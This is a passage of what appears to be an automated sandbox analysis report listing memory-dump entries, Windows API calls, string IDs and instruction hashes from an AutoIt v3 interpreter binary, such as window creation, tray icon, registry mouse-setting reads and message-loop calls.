                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
• Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                                                                                                                                                                                                                                                                    • String ID: TaskbarCreated
                                                                                                                                                                                                                                                                                                    • API String ID: 129472671-2362178303

                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
• Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • Opcode ID: 79599681bd5eaedd4308db87f2d7c517202dc580c5f67541b3230267c4ca2311
                                                                                                                                                                                                                                                                                                    • Instruction ID: 314460939e3eeafb289500cc047cb2c563fd109956d2e0cff342af75c75ff002
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 79599681bd5eaedd4308db87f2d7c517202dc580c5f67541b3230267c4ca2311
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5AC1D278D042899FDF11DFE8D841BAFBBB4AF8A310F144159F554AB2D2C730A952CB61

                                                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • String ID: d0b$d10m0$d1b$d1r0,2$d5m0$i
                                                                                                                                                                                                                                                                                                    • API String ID: 0-4285391669
                                                                                                                                                                                                                                                                                                    • Opcode ID: 5467567adfb9840c3bfeb61cb9c17eecd95cf884e930445160f28a6c9661ae40
                                                                                                                                                                                                                                                                                                    • Instruction ID: 9105e1b9720abab837dcd0ad028f668ae3d0f4477dee6b429c270985c89043da
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5467567adfb9840c3bfeb61cb9c17eecd95cf884e930445160f28a6c9661ae40
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 83623670508341CFC724CF18D195AAABBF5BF89304F148A6EE89A8B391DB71D945CF92

                                                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                                                    control_flow_graph 1001 a135b3-a13623 CreateWindowExW * 2 ShowWindow * 2
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00A135E1
                                                                                                                                                                                                                                                                                                    • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00A13602
                                                                                                                                                                                                                                                                                                    • ShowWindow.USER32(00000000,?,?,?,?,?,?,00A13368,?), ref: 00A13616
                                                                                                                                                                                                                                                                                                    • ShowWindow.USER32(00000000,?,?,?,?,?,?,00A13368,?), ref: 00A1361F
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Window$CreateShow
                                                                                                                                                                                                                                                                                                    • String ID: AutoIt v3$edit
                                                                                                                                                                                                                                                                                                    • API String ID: 1584632944-3779509399
                                                                                                                                                                                                                                                                                                    • Opcode ID: 07cfe97f136322fc212ac44032fcd9df4ea67382fb43f457faa99fd4cd2399f7
                                                                                                                                                                                                                                                                                                    • Instruction ID: 226d122b808dcb3c326f2c3f78153676d7153f9f929509ce841829725bba14ec
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 07cfe97f136322fc212ac44032fcd9df4ea67382fb43f457faa99fd4cd2399f7
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C5F017746402D67AE7259793AC88F372EBDE7C7F50B00001EB904AF5A0D2690842DFB0

                                                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00A55287
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A18577: _wcslen.LIBCMT ref: 00A1858A
                                                                                                                                                                                                                                                                                                    • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00A16299
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: IconLoadNotifyShell_String_wcslen
                                                                                                                                                                                                                                                                                                    • String ID: Line %d: $AutoIt -
                                                                                                                                                                                                                                                                                                    • API String ID: 2289894680-4094128768
                                                                                                                                                                                                                                                                                                    • Opcode ID: d897a833ef9a319b562f217f569a4b09f84e6df91f63fd126f052eb5d5f50d8c
                                                                                                                                                                                                                                                                                                    • Instruction ID: b66eda8b22d9390351b10ea3a332ac3d65e8c2e947829c34817d905b53cd2f72
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d897a833ef9a319b562f217f569a4b09f84e6df91f63fd126f052eb5d5f50d8c
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A1419571808305AAC711EB60DD45BDF77ECAF94310F104A2EF59996091EB749689CB92

APIs
• RegOpenKeyExW.KERNEL32(80000001,Control Panel\Mouse,00000000,00000001,00000000,?,?,80000001,80000001,?,00A158BE,SwapMouseButtons,00000004,?), ref: 00A158EF
• RegQueryValueExW.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,80000001,80000001,?,00A158BE,SwapMouseButtons,00000004,?), ref: 00A15910
• RegCloseKey.KERNEL32(00000000,?,?,?,80000001,80000001,?,00A158BE,SwapMouseButtons,00000004,?), ref: 00A15932
Strings
Memory Dump Source
• Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
• Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
Similarity
• API ID: CloseOpenQueryValue
• String ID: Control Panel\Mouse
• API String ID: 3677997916-824357125
Strings
• Variable must be of type 'Object'., xrefs: 00A648C6
Memory Dump Source
• Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
• Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
Similarity
• API ID:
• String ID: Variable must be of type 'Object'.
• API String ID: 0-109567571
APIs
• __Init_thread_footer.LIBCMT ref: 00A215F2
Memory Dump Source
• Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
• Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
Similarity
• API ID: Init_thread_footer
• String ID:
• API String ID: 1385522511-0
APIs
• __CxxThrowException@8.LIBVCRUNTIME ref: 00A309D8
  • Part of subcall function 00A33614: RaiseException.KERNEL32(?,?,?,00A309FA,?,00000000,?,?,?,?,?,?,00A309FA,00000000,00AD9758,00000000), ref: 00A33674
• __CxxThrowException@8.LIBVCRUNTIME ref: 00A309F5
Strings
Memory Dump Source
• Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
• Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
Similarity
• API ID: Exception@8Throw$ExceptionRaise
• String ID: Unknown exception
• API String ID: 3476068407-410509341
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • GetCurrentProcess.KERNEL32(00000000,00000067,000000FF,?,?,?), ref: 00A98D52
                                                                                                                                                                                                                                                                                                    • TerminateProcess.KERNEL32(00000000), ref: 00A98D59
                                                                                                                                                                                                                                                                                                    • FreeLibrary.KERNEL32(?,?,?,?), ref: 00A98F3A
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Process$CurrentFreeLibraryTerminate
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 146820519-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: 9f0bd15bf6092e3c5b6110f3d2d81f18f9b6c5b5e871913b2ea4a0d2517e1078
                                                                                                                                                                                                                                                                                                    • Instruction ID: f42a0aee20734e2e9aa8c7552b69b09dc2c02294950dc8360787573d58ebdb4b
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9f0bd15bf6092e3c5b6110f3d2d81f18f9b6c5b5e871913b2ea4a0d2517e1078
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 85127A71A083019FCB14DF28C584B6ABBE5FF89314F14895DE8898B292DB35ED45CB92
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: _wcslen$_strcat
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 306214811-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: 5bffd9bd6193104e79085fe75cbb97e6b5674f7f54467323ef3ab4f692eef9f2
                                                                                                                                                                                                                                                                                                    • Instruction ID: cc951da9e67a805cc96afd2b6a55328037a872e48e70e875ca2e3b0e6f521ba9
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5bffd9bd6193104e79085fe75cbb97e6b5674f7f54467323ef3ab4f692eef9f2
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D8A15931600615EFCB18DF58D5D19AABBF1FF49314B6084ADE84A8F692DB35ED42CB80
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A1327E: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00A132AF
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A1327E: MapVirtualKeyW.USER32(00000010,00000000), ref: 00A132B7
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A1327E: MapVirtualKeyW.USER32(000000A0,00000000), ref: 00A132C2
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A1327E: MapVirtualKeyW.USER32(000000A1,00000000), ref: 00A132CD
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A1327E: MapVirtualKeyW.USER32(00000011,00000000), ref: 00A132D5
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A1327E: MapVirtualKeyW.USER32(00000012,00000000), ref: 00A132DD
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A13205: RegisterWindowMessageW.USER32(00000004,?,00A12964), ref: 00A1325D
                                                                                                                                                                                                                                                                                                    • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 00A12A0A
                                                                                                                                                                                                                                                                                                    • OleInitialize.OLE32 ref: 00A12A28
                                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,00000000), ref: 00A53A0D
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 1986988660-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: 4a592efc8fe72c6193754ff959e285f11b0ac08588c7292f14c96494c1703d7d
                                                                                                                                                                                                                                                                                                    • Instruction ID: 77ac431596d070582a352a7ab869913a8c4bebf13e54ed250fde9c120203f841
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4a592efc8fe72c6193754ff959e285f11b0ac08588c7292f14c96494c1703d7d
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3C719FB19112848ED798EFB9EEE57553BECFB49304740422AD059CF2A1EBB88443CF65
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A161A9: Shell_NotifyIconW.SHELL32(00000001,?), ref: 00A16299
                                                                                                                                                                                                                                                                                                    • KillTimer.USER32(?,00000001,?,?), ref: 00A2FD36
                                                                                                                                                                                                                                                                                                    • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00A2FD45
                                                                                                                                                                                                                                                                                                    • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00A6FE33
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: IconNotifyShell_Timer$Kill
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 3500052701-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: b8d8703ce3f4f8e923917ff65491d3948e8a68c52a1ff06d44bc7842485ef5fe
                                                                                                                                                                                                                                                                                                    • Instruction ID: 4071957da3e8112215bb2d9013e30f97e7783c7b9c015e74f81faccd67040645
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b8d8703ce3f4f8e923917ff65491d3948e8a68c52a1ff06d44bc7842485ef5fe
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 12319571904354AFEB32CF249895BE6BBFC9B02308F0004AEE5DA97242D3742A85CB51
APIs
• CloseHandle.KERNEL32(00000000,00000000,?,?,00A4894C,?,00AD9CE8,0000000C), ref: 00A48A84
• GetLastError.KERNEL32(?,00A4894C,?,00AD9CE8,0000000C), ref: 00A48A8E
• __dosmaperr.LIBCMT ref: 00A48AB9
Memory Dump Source
• Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
• Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
Similarity
• API ID: CloseErrorHandleLast__dosmaperr
• String ID:
• API String ID: 2583163307-0
APIs
• SetFilePointerEx.KERNEL32(00000000,00000000,00000002,FF8BC369,00000000,FF8BC35D,00000000,1875FF1C,1875FF1C,?,00A497BA,FF8BC369,00000000,00000002,00000000), ref: 00A49744
• GetLastError.KERNEL32(?,00A497BA,FF8BC369,00000000,00000002,00000000,?,00A45ED4,00000000,00000000,00000000,00000002,00000000,FF8BC369,00000000,00A36F41), ref: 00A4974E
• __dosmaperr.LIBCMT ref: 00A49755
Memory Dump Source
• Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
• Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
Similarity
• API ID: ErrorFileLastPointer__dosmaperr
• String ID:
• API String ID: 2336955059-0
APIs
• TranslateMessage.USER32(?), ref: 00A1F27B
• DispatchMessageW.USER32(?), ref: 00A1F289
• PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00A1F29F
• Sleep.KERNEL32(0000000A), ref: 00A1F2B1
• TranslateAcceleratorW.USER32(?,?,?), ref: 00A632D8
Memory Dump Source
• Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
• Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
Similarity
• API ID: Message$Translate$AcceleratorDispatchPeekSleep
• String ID:
• API String ID: 3288985973-0
APIs
• __Init_thread_footer.LIBCMT ref: 00A23006
Strings
Memory Dump Source
• Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
• Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
Similarity
• API ID: Init_thread_footer
• String ID: CALL
• API String ID: 1385522511-4196123274
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
• Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • GetOpenFileNameW.COMDLG32(?), ref: 00A5413B
